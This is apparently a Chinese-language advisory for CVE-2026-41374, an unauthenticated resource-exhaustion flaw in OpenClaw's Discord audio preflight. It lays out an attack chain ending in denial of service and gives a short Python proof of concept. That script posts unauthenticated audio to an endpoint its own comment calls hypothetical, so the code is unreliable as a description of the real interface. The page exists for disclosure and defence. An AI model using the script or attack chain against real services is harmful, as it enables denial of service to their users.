CVE-2026-41374 CVSS 5.3 中危

CVE-2026-41374 OpenClaw 资源耗尽漏洞

披露日期: 2026-04-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41374

漏洞类型

资源耗尽

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31 之前的版本在处理 Discord 音频预检查时存在逻辑缺陷。由于系统在验证成员授权之前就执行转录操作，未经身份验证的攻击者可利用此漏洞，无需通过白名单验证即可触发音频处理，进而导致系统资源耗尽，影响服务可用性。

技术细节

该漏洞的根源在于 OpenClaw 处理 Discord 音频预检查时的逻辑错误，具体表现为“先执行，后验证”的安全设计缺陷。在受影响版本中，当接收到音频数据时，系统会立即启动资源密集型的转录处理流程，而在此过程中并未首先检查请求者是否在授权成员白名单内。攻击者可以通过网络向受影响接口发送特定的音频数据。由于缺乏早期的权限校验，系统被迫持续分配 CPU 和内存资源来处理这些未经授权的请求。这种资源消耗攻击可以由远程发起，无需任何用户交互，攻击者通过发送大量请求即可导致服务响应变慢甚至完全瘫痪，属于典型的拒绝服务漏洞。

攻击链分析

STEP 1

侦察

攻击者通过端口扫描或网络测绘发现目标 OpenClaw 服务。

STEP 2

漏洞利用

攻击者向 OpenClaw 的音频预检查接口发送特制的音频数据请求，且不携带任何身份认证信息。

STEP 3

资源消耗

目标系统接收到请求后，由于逻辑缺陷，跳过了白名单验证，直接进行资源密集型的音频转录处理。

STEP 4

拒绝服务

攻击者持续发送此类请求，耗尽服务器 CPU 和内存资源，导致合法用户无法访问服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    """
    PoC for CVE-2026-41374: Resource Consumption via Discord Audio Preflight
    This script attempts to trigger audio processing without authentication.
    """
    # Endpoint for audio preflight (hypothetical based on description)
    endpoint = f"{target_url}/api/discord/audio/preflight"
    
    # Simulate audio payload
    headers = {
        "Content-Type": "application/json"
    }
    # Note: No Authorization or Cookie headers are sent
    payload = {
        "audio_stream": "base64_encoded_dummy_audio_data"
    }

    try:
        print(f"[*] Sending request to {endpoint} without authentication...")
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        
        if response.status_code == 200:
            print("[+] Potential vulnerability confirmed! Server processed audio without auth.")
            print(f"[+] Response: {response.text[:100]}")
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] Server correctly rejected unauthenticated request. Patched.")
        else:
            print(f"[?] Unexpected status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"Error connecting to target: {e}")

if __name__ == "__main__":
    target = "http://localhost:8080" # Replace with actual target
    check_vulnerability(target)

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

如果无法立即升级，建议在网络防火墙或应用网关层面对 OpenClaw 的音频处理接口实施严格的 IP 白名单访问控制，仅允许可信的 Discord 服务器 IP 访问，从而阻断未授权的流量触发资源消耗。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表